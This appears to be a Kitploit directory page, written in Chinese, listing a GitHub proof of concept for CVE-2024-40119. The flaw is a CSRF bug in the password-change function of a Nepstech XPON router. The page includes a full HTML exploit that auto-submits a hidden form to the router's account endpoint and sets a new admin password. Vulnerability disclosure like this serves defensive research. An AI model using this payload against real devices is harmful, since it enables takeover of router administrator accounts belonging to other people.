Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
nepstech-xpon-router-CVE-2024-40119 — 跨站请求伪造(CSRF)漏洞存在于密码修改功能中,允许远程攻击者在未经用户同意的情况下更改管理员密码,从而导致潜在的账户劫持。 | Kitploit
工具/GitHubGitHub/baroi-ai/nepstech-xpon-router-cve-2024-40119
物联网安全漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubbaroi-ai/nepstech-xpon-router-cve-2024-40119

nepstech-xpon-router-CVE-2024-40119

跨站请求伪造(CSRF)漏洞存在于密码修改功能中,允许远程攻击者在未经用户同意的情况下更改管理员密码,从而导致潜在的账户劫持。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
1152年前尚未审核

nepstech-xpon-router-CVE-2024-40119

作者:

Subhodeep Baroi

CVE-2024-40119:Nepstech无线路由器NTPL-XPON1GFEVN v1.0中的CSRF漏洞

描述

CVE-2024-40119 是Nepstech Wifi Router xpon NTPL-XPON1GFEVN v1.0固件v2.0.1中的一个跨站请求伪造(CSRF)漏洞。该漏洞允许远程攻击者在未经用户同意的情况下更改管理员密码,可能导致帐户被接管。

详细信息

  • 漏洞类型: 跨站请求伪造(CSRF)
  • 产品供应商: Nepstech
  • 受影响产品代码库: Wifi Router xpon (终端) - 型号:NTPL-XPON1GFEVN - 版本:1.0 和 固件:V2.0.1
  • 受影响组件: 路由器Web应用程序的密码更改功能
  • 攻击类型: 远程
  • 影响: 管理员帐户接管

攻击向量

远程攻击者可以精心制作一个恶意HTML页面,当经过身份验证的用户访问该页面时,会触发密码更改功能。以下是一个示例攻击向量:

root@kitploit:~
<!DOCTYPE html>
<html>
  <body>
    <form action="http://192.168.1.1/cgi-bin/mag-account.asp" method="POST">
      <input type="hidden" name="name0" value="admin" />
      <input type="hidden" name="name1" value="user" />
      <input type="hidden" name="name2" value="user3" />
      <input type="hidden" name="oldUsername" value="admin" />
      <input type="hidden" name="newUsername" value="" />
      <input type="hidden" name="oldPassword" value="" />
      <input type="hidden" name="newPassword" value="UserUser2&#64;" />
      <input type="hidden" name="cfmPassword" value="UserUser2&#64;" />
      <input type="hidden" name="accountflg" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
下载工具